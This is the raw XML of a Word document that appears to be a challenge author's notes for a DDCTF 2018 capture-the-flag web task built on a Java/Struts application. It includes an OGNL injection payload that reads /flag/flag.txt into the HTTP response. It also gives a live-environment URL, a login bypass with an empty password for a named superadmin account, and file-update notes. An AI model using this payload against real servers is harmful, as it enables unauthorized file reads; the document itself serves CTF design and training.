    <w:p w:rsidR="009729CF" w:rsidRPr="009729CF" w:rsidRDefault="009729CF" w:rsidP="009729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i/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009729CF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>${#a=new java.io.File("/flag/flag.txt"),#b=new java.io.FileReader(#a),#c=new java.io.BufferedReader(#b),#e=#c.readLine(),#c.close(),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001E4AA3" w:rsidRPr="009729CF" w:rsidRDefault="001E4AA3" w:rsidP="003913F0"/>
    <w:p w:rsidR="00DC0C88" w:rsidRDefault="006F09AB" w:rsidP="003913F0">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令执行POC得到的结果：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F09AB" w:rsidRDefault="002A3AFE" w:rsidP="003913F0">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1C606E3A" wp14:editId="340C33C7">
            <wp:extent cx="5274310" cy="2901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0C" w:rsidRDefault="009C100C" w:rsidP="00FB6028">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>读取Flag的EXP执行结果：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE40F7" w:rsidRDefault="005D3F04" w:rsidP="00FB6028">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5E0C172A" wp14:editId="1F1C5450">
            <wp:extent cx="5274310" cy="2051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24" w:rsidRDefault="00DB2224" w:rsidP="00FB6028"/>
    <w:p w:rsidR="00AB3F0C" w:rsidRDefault="00AB3F0C" w:rsidP="00FB6028"/>
    <w:p w:rsidR="00B66B21" w:rsidRDefault="00B66B21" w:rsidP="003A46F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线上环境</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B66B21" w:rsidRPr="002946E6" w:rsidRDefault="002946E6" w:rsidP="002946E6">
      <w:pPr>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r w:rsidRPr="002946E6">
        <w:t>http://116.85.48.104:5036/gd5Jq3XoKvGKqu5tIH2p/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A46FB" w:rsidRPr="00EF6242" w:rsidRDefault="003A46FB" w:rsidP="003A46F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Bug修复</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AB3F0C" w:rsidRDefault="003A46FB" w:rsidP="007409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 w:rsidRPr="006D34AC">
        <w:t>superadmin_hahaha_2333</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和空密码可登陆。增加密码为空的判断。 2018/02/26</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00465102" w:rsidRDefault="00465102" w:rsidP="00465102">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="420" w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00465102">
        <w:t>docker_ddctf\web\webapps\ROOT\WEB-INF\classes\com\eliteams\quick4j\web\controller</w:t>
      </w:r>
      <w:r>
        <w:t>\</w:t>
      </w:r>
      <w:r w:rsidRPr="00465102">
        <w:t>UserController.class</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件更新</w:t>
      </w:r>
      <w:r w:rsidR="00A62727">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A46FB" w:rsidRDefault="003A46FB" w:rsidP="007409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</w:t>
      </w:r>
      <w:r>
        <w:t>J</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>vm-sandbox”没给执行权限。使用bash运行。  2018/02/26</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00732CFE" w:rsidRDefault="00E578CA" w:rsidP="00FB6028">
      <w:r w:rsidRPr="00E578CA">
        <w:t>docker_ddctf\web2\flag</w:t>
      </w:r>
      <w:r>
        <w:t>\</w:t>
      </w:r>
      <w:r w:rsidRPr="00E578CA">
        <w:t>docker-entrypoint.sh</w:t>
      </w:r>
      <w:r w:rsidR="00A62727">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>更新。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E578CA" w:rsidRPr="00EB05A3" w:rsidRDefault="00E578CA" w:rsidP="00FB6028"/>
    <w:sectPr w:rsidR="00E578CA" w:rsidRPr="00EB0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C4E" w:rsidRDefault="00842C4E" w:rsidP="00A251A3">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00842C4E" w:rsidRDefault="00842C4E" w:rsidP="00A2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C4E" w:rsidRDefault="00842C4E" w:rsidP="00A251A3">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00842C4E" w:rsidRDefault="00842C4E" w:rsidP="00A2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4211"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6A8E2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0771B4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C3983CBC"/>
    <w:lvl w:ilvl="0" w:tplc="907095DC">
      <w:start w:val="7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700BB1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="72720BBE"/>
    <w:lvl w:ilvl="0" w:tplc="7DBE6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F5508"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="02420720"/>
    <w:lvl w:ilvl="0" w:tplc="22625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6F5C62"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D20A40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60"/>
    <w:rsid w:val="00020C78"/>
    <w:rsid w:val="00032D25"/>
    <w:rsid w:val="00074F5A"/>
    <w:rsid w:val="000927D1"/>
    <w:rsid w:val="000C2F5E"/>
    <w:rsid w:val="001109A5"/>
    <w:rsid w:val="00131424"/>
    <w:rsid w:val="001357A2"/>
    <w:rsid w:val="00143188"/>
    <w:rsid w:val="00166698"/>
    <w:rsid w:val="001A1A8B"/>
    <w:rsid w:val="001B37BD"/>
    <w:rsid w:val="001C7BB9"/>
    <w:rsid w:val="001E28A9"/>
    <w:rsid w:val="001E4AA3"/>
    <w:rsid w:val="001F1ED0"/>
    <w:rsid w:val="001F7674"/>
    <w:rsid w:val="0023786F"/>
    <w:rsid w:val="00245156"/>
    <w:rsid w:val="00250BC4"/>
    <w:rsid w:val="00260A69"/>
    <w:rsid w:val="002758AF"/>
    <w:rsid w:val="002946E6"/>
    <w:rsid w:val="00295A86"/>
    <w:rsid w:val="002A3AFE"/>
    <w:rsid w:val="002B196B"/>
    <w:rsid w:val="002C06F0"/>
    <w:rsid w:val="002C2740"/>
    <w:rsid w:val="002E187B"/>
    <w:rsid w:val="002E53F8"/>
    <w:rsid w:val="002F1873"/>
    <w:rsid w:val="002F5074"/>
    <w:rsid w:val="002F7CBA"/>
    <w:rsid w:val="0033386E"/>
    <w:rsid w:val="00355BEE"/>
    <w:rsid w:val="003667DC"/>
    <w:rsid w:val="003913F0"/>
    <w:rsid w:val="003A46FB"/>
    <w:rsid w:val="003E36E2"/>
    <w:rsid w:val="003F169E"/>
    <w:rsid w:val="004041E1"/>
    <w:rsid w:val="004445E4"/>
    <w:rsid w:val="00465102"/>
    <w:rsid w:val="004B019F"/>
    <w:rsid w:val="004B19CD"/>
    <w:rsid w:val="004B6FED"/>
    <w:rsid w:val="004E5858"/>
    <w:rsid w:val="00500858"/>
    <w:rsid w:val="00525B4F"/>
    <w:rsid w:val="00533D60"/>
    <w:rsid w:val="0056535C"/>
    <w:rsid w:val="005A6FF5"/>
    <w:rsid w:val="005B633E"/>
    <w:rsid w:val="005C5824"/>
    <w:rsid w:val="005C5EBA"/>
    <w:rsid w:val="005D3F04"/>
    <w:rsid w:val="005E674C"/>
    <w:rsid w:val="005F54D4"/>
    <w:rsid w:val="006050D6"/>
    <w:rsid w:val="00617CC5"/>
    <w:rsid w:val="0064555C"/>
    <w:rsid w:val="00667B8F"/>
    <w:rsid w:val="006822D9"/>
    <w:rsid w:val="0068493B"/>
    <w:rsid w:val="00694660"/>
    <w:rsid w:val="006D02DA"/>
    <w:rsid w:val="006D34AC"/>
    <w:rsid w:val="006F09AB"/>
    <w:rsid w:val="006F0CF9"/>
    <w:rsid w:val="00706823"/>
    <w:rsid w:val="00725616"/>
    <w:rsid w:val="00732CFE"/>
    <w:rsid w:val="007409BB"/>
    <w:rsid w:val="00761171"/>
    <w:rsid w:val="00762F6E"/>
    <w:rsid w:val="0076745D"/>
    <w:rsid w:val="00770160"/>
    <w:rsid w:val="007727F5"/>
    <w:rsid w:val="007765DA"/>
    <w:rsid w:val="0077747D"/>
    <w:rsid w:val="00786512"/>
    <w:rsid w:val="007A0119"/>
    <w:rsid w:val="007B0AC5"/>
    <w:rsid w:val="00842C4E"/>
    <w:rsid w:val="008621A8"/>
    <w:rsid w:val="00895D1B"/>
    <w:rsid w:val="008F6C1D"/>
    <w:rsid w:val="00900B58"/>
    <w:rsid w:val="00912135"/>
    <w:rsid w:val="00917D0C"/>
    <w:rsid w:val="009205B9"/>
    <w:rsid w:val="009254DA"/>
    <w:rsid w:val="00931A5F"/>
    <w:rsid w:val="00933294"/>
    <w:rsid w:val="00944585"/>
    <w:rsid w:val="009523EE"/>
    <w:rsid w:val="00957369"/>
    <w:rsid w:val="009729CF"/>
    <w:rsid w:val="00981005"/>
    <w:rsid w:val="009912FF"/>
    <w:rsid w:val="00992520"/>
    <w:rsid w:val="009A68A5"/>
    <w:rsid w:val="009C100C"/>
    <w:rsid w:val="009C2137"/>
    <w:rsid w:val="009F5E3B"/>
    <w:rsid w:val="00A12296"/>
    <w:rsid w:val="00A251A3"/>
    <w:rsid w:val="00A62727"/>
    <w:rsid w:val="00A929CB"/>
    <w:rsid w:val="00AA5700"/>
    <w:rsid w:val="00AB3F0C"/>
    <w:rsid w:val="00AF1DD0"/>
    <w:rsid w:val="00AF4246"/>
    <w:rsid w:val="00B23930"/>
    <w:rsid w:val="00B300C0"/>
    <w:rsid w:val="00B30240"/>
    <w:rsid w:val="00B66B21"/>
    <w:rsid w:val="00B901D1"/>
    <w:rsid w:val="00B90477"/>
    <w:rsid w:val="00BD6A4B"/>
    <w:rsid w:val="00BE146F"/>
    <w:rsid w:val="00BE7F6B"/>
    <w:rsid w:val="00C05E1A"/>
    <w:rsid w:val="00C169C3"/>
    <w:rsid w:val="00C23EC5"/>
    <w:rsid w:val="00C550B6"/>
    <w:rsid w:val="00CB4D9D"/>
    <w:rsid w:val="00CE231B"/>
    <w:rsid w:val="00CF3030"/>
    <w:rsid w:val="00D02FB9"/>
    <w:rsid w:val="00D12F76"/>
    <w:rsid w:val="00D16391"/>
    <w:rsid w:val="00D22BF9"/>
    <w:rsid w:val="00D5227B"/>
    <w:rsid w:val="00D55AF3"/>
    <w:rsid w:val="00D74A48"/>
    <w:rsid w:val="00D81E8C"/>
    <w:rsid w:val="00D85FA6"/>
    <w:rsid w:val="00D94377"/>
    <w:rsid w:val="00DB2224"/>
    <w:rsid w:val="00DB48ED"/>
    <w:rsid w:val="00DC0C88"/>
    <w:rsid w:val="00DC233E"/>
    <w:rsid w:val="00DE40F7"/>
    <w:rsid w:val="00DF22DA"/>
    <w:rsid w:val="00DF7CDE"/>
    <w:rsid w:val="00E45CCE"/>
    <w:rsid w:val="00E534DB"/>
    <w:rsid w:val="00E578CA"/>
    <w:rsid w:val="00E749FD"/>
    <w:rsid w:val="00E81985"/>
    <w:rsid w:val="00E8403B"/>
    <w:rsid w:val="00E91A82"/>
    <w:rsid w:val="00EB04E1"/>
    <w:rsid w:val="00EB05A3"/>
    <w:rsid w:val="00EB16BB"/>
    <w:rsid w:val="00EF6242"/>
    <w:rsid w:val="00F06E3C"/>
    <w:rsid w:val="00F23591"/>
    <w:rsid w:val="00F75692"/>
    <w:rsid w:val="00FB04D5"/>
    <w:rsid w:val="00FB6028"/>
    <w:rsid w:val="00FB6B58"/>
    <w:rsid w:val="00FC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5F42B"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{7A14DD32-1A23-4400-A709-76B22307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0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5E3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2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51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5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teams/quick4j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tomcat_2:8080/hello.a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482</Words>
  <Characters>2749</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>22</Lines>
  <Paragraphs>6</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company>Microsoft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angelwhu</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>angelwhu</cp:lastModifiedBy>
  <cp:revision>157</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-02-23T10:18:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-04-11T02:55:00Z</dcterms:modified>
</cp:coreProperties>
</file>